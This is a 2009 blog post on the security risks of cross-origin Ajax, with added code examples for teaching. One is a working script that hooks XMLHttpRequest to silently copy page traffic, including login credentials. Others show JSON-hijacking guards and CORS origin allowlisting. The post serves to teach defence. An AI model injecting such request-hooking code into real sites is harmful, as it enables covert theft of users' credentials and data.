Cross Origin Ajax Requests Have Landed

by Thomas Powell | July 6th, 2009

A year ago I mentioned that cross-origin Ajax requests were coming, and then they got backed out of the last version of Firefox. Well, they are back now and they do work in Firefox 3.5. IE 8 landed similar functionality using something called XDomainRequest (XDR). Of course the big question is still: is this a good thing?

Simplicity of communication rules, so I’ll just answer directly.  NO, this really isn’t a good thing unless you are quite careful, or unless you make some of your living as a security consultant.

The bottom line with JavaScript-based Web services is that if you include remote script in your page, it can OWN you.  The very nature of JavaScript is that it can rewrite your objects as it likes.  That is its nature; it isn’t a security flaw.  Further, it has quite a few ways of communicating and can leak information out quite easily: from history, from cookies, and maybe more.

In the Ajax book we demonstrated over and over the security concern with trusting JavaScript that should not be trusted.  If you haven’t seen a demo, here is a parasitic JavaScript binding onto the underlying XMLHttpRequest object that powers everything and watching your data.   If you pull in remote script it can do these kinds of things and worse.  This isn’t a tech flaw; this is a trust flaw on your part as a developer.
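The parasitic binding described above, written out as an added example (this is not the demo from the book or from the original post). Node has no XMLHttpRequest, so a minimal stand-in class is constructed here; in a browser the same hook would patch the real XMLHttpRequest.prototype and the exfiltration sink would be a beacon such as an image request to the attacker's host, which are assumptions of this example.

```javascript
// Added example: what a "parasitic" third-party script can do once it runs
// in your page. The XMLHttpRequest below is a constructed stand-in for the
// browser's; the patching technique is identical against the real one.

class XMLHttpRequest {              // constructed stand-in, not the browser's
  open(method, url) { this.method = method; this.url = url; }
  send(body) { this.body = body; return `sent ${this.method} ${this.url}`; }
}

// Where the attacker's copy of the traffic ends up. In a real attack this
// would be a beacon (for example new Image().src = ...) to the attacker's host.
const exfiltrated = [];

// What a hostile <script src="https://third-party.example/widget.js"> could
// do: wrap the page's XHR methods so every request is copied before it goes.
// The page keeps working exactly as before, so nothing looks wrong.
function installParasite(XHR) {
  const origOpen = XHR.prototype.open;
  const origSend = XHR.prototype.send;
  XHR.prototype.open = function (method, url, ...rest) {
    this.__parasite = { method, url };           // remember where it is going
    return origOpen.call(this, method, url, ...rest);
  };
  XHR.prototype.send = function (body) {
    exfiltrated.push({ ...this.__parasite, body }); // copy the payload out
    return origSend.call(this, body);            // then let it proceed normally
  };
}

// The page's own, perfectly ordinary Ajax call.
function postLogin(user, password) {
  const xhr = new XMLHttpRequest();
  xhr.open('POST', '/api/login');
  return xhr.send(JSON.stringify({ user, password }));
}

// The included script runs first, then the page makes its call. The call
// succeeds, and the credentials are now in the attacker's hands as well.
function parasiteDemo() {
  installParasite(XMLHttpRequest);
  postLogin('alice', 'hunter2');                 // constructed credentials
  return exfiltrated;
}
```

Note that nothing in the page's own code changed; the included script only had to run before the page's first request. Freezing the prototype or saving a private reference to the original methods does not help if the third-party script is included earlier in the document, which is the usual placement for analytics and widget code.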

Given the nature of JavaScript and how it is generally employed, you should have extreme trust in any remote source, be it linked script, retrieved code or even fetched JSON packets, before you use it.  Unfortunately that just isn’t the situation in most cases.   The Mozilla documentation talks all about the features in the new Firefox, but it takes until the very bottom before this cold bucket of water is acknowledged:

A Note on Security

In general, data requested from a remote site should be treated as untrusted. Executing JavaScript code retrieved from a third-party site without first determining its validity is NOT recommended. Server administrators should be careful about leaking private data, and should judiciously determine that resources can be called in a cross-site manner.

So read that carefully: you should determine validity before using script from 3rd parties.  But here is the rub: is that going to stay constant?  If you look once and then just use it, what’s to say that source doesn’t change, or gets owned and then owns you?  Absolutely nothing, unless you are monitoring the script for changes with some proxy.  Great idea, almost never done.

Don’t get me wrong.  I like new features and in fact am pro Web service, but the reality is that you are extending implicit and significant trust here.  Even with just data passed back, people have seen interesting hacks overriding the getters/setters for array values.  In short, even pure data responses have issues unless they are carefully wrapped.  Mix in the dynamic nature of JavaScript and it is a recipe for disaster.  Trust is the concern, and you should not trust implicitly.  Further, you should be minding your store lest you get owned by whatever Web service you link to or script you include.
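What "carefully wrapped" means in practice, as an added example (not code from the original post): a bare JSON array or object is also a valid JavaScript program, so a hostile page could load an authenticated JSON endpoint with a script tag and, in the browsers of the time where constructor and setter hooks fired for literals, read the data through those hooks. Prefixing the body with a token that is a syntax error for a script loader, and stripping it before parsing, closes that path. The response data and the guard prefix are constructed for this example.

```javascript
// Added example: why "pure data" responses still need wrapping, and the
// wrap/unwrap pair that protects them. Data below is constructed.

const GUARD = ")]}',\n";   // a prefix several real-world frameworks use

// Would this body run as a script at all? new Function parses the body as a
// program without executing it; a SyntaxError means a <script src> pointing
// at this response would fail before any hijacked hook could see the data.
function loadsAsScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    return !(e instanceof SyntaxError);
  }
}

// What the server should emit for a JSON endpoint that carries user data.
function wrapJsonResponse(data) {
  return GUARD + JSON.stringify(data);
}

// The only consumer that can read it: your own XHR code, which checks for the
// guard, strips it, and only then parses. A missing guard means either this is
// not the endpoint you think it is or someone is feeding you unwrapped data.
function parseGuardedJson(body) {
  if (!body.startsWith(GUARD)) {
    throw new Error('response is missing the anti-hijacking prefix');
  }
  return JSON.parse(body.slice(GUARD.length));
}

function jsonWrapDemo() {
  const secret = [{ user: 'alice', sessionToken: 'abc123' }];   // constructed
  const naive = JSON.stringify(secret);
  const wrapped = wrapJsonResponse(secret);
  return {
    naiveLoadsAsScript: loadsAsScript(naive),      // a <script src> accepts it
    wrappedLoadsAsScript: loadsAsScript(wrapped),  // SyntaxError at the first byte
    roundTrip: parseGuardedJson(wrapped)[0].sessionToken,
  };
}
```

Some sites used an infinite loop such as `while(1);` as the prefix instead; the effect is the same, the response is useless as a script but trivially unwrapped by the code that expects it. Modern engines no longer invoke the Array constructor or prototype setters for literals, so the original hijack does not fire today, but the wrapping costs nothing and also protects the endpoint from any future trick of the same shape.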

I am certainly not the only one who sees this, and I can’t say that this type of alarm ringing is novel.  In fact we have been down this path before.  Flash supports similar technology using its crossdomain.xml file, and folks like Jeremiah Grossman clearly pointed out that out in the wild it is quite often done wrong, and in many cases quite wrong.  Now that Firefox and other browsers are supporting it natively, I think we are going to see an explosion in cross-origin calls before there is a retreat as quality and security problems explode.  That isn’t all bad; you usually do have to exercise something to shake out the problems.  Just be careful!
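The server-side decision is where crossdomain.xml went wrong in the wild (a wildcard allow-access-from policy) and where the new browser mechanism can go wrong the same way. As an added example, not code from the original post, here are two versions of the handler that chooses the Access-Control-Allow-Origin response header: one that echoes whatever Origin the browser sends, which is the CORS equivalent of the wildcard policy, and one that checks an explicit allowlist. The allowlist, the request origins and the header shape are constructed for this example; the lookalike origins at the end are there to show what a substring or suffix check would let through.

```javascript
// Added example: the cross-origin policy decision on the server side, with
// the common mistake beside the correct check. Origins below are constructed.

const ALLOWED_ORIGINS = new Set([
  'https://app.example.com',
  'https://admin.example.com',
]);

// Done wrong: whatever Origin the browser sends is reflected, with credentials
// enabled. Any page on the web can now read this resource with the victim's
// cookies attached, which is the CORS analogue of <allow-access-from domain="*"/>.
function corsHeadersReflectAny(originHeader) {
  return {
    'Access-Control-Allow-Origin': originHeader,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Done right: exact match against the allowlist; anything else gets no CORS
// headers at all, so the browser withholds the response from the calling page.
// 'Vary: Origin' keeps shared caches from serving one origin's answer to another.
function corsHeadersAllowlisted(originHeader) {
  if (!ALLOWED_ORIGINS.has(originHeader)) {
    return {};
  }
  return {
    'Access-Control-Allow-Origin': originHeader,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Origin headers as a browser would send them (constructed). The last two are
// lookalikes that a sloppy check such as origin.endsWith('example.com') or
// origin.includes('app.example.com') would wave through.
const REQUEST_ORIGINS = [
  'https://app.example.com',
  'https://evil.example',
  'https://app.example.com.evil.example',
  'https://notexample.com',
];

// Run one handler over every request origin; returns which origin, if any,
// the browser would be told may read the response.
function decide(handler) {
  const out = {};
  for (const origin of REQUEST_ORIGINS) {
    out[origin] = handler(origin)['Access-Control-Allow-Origin'] || null;
  }
  return out;
}
```

The allowlist compares the full origin (scheme, host and port) and nothing else; parsing the host out and matching on a domain suffix is how the lookalike entries above get in. The same discipline applies to a crossdomain.xml: list the exact domains that need access rather than a wildcard.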


Thomas Powell is a long-time web industry veteran, as well as the founder and CEO of PINT.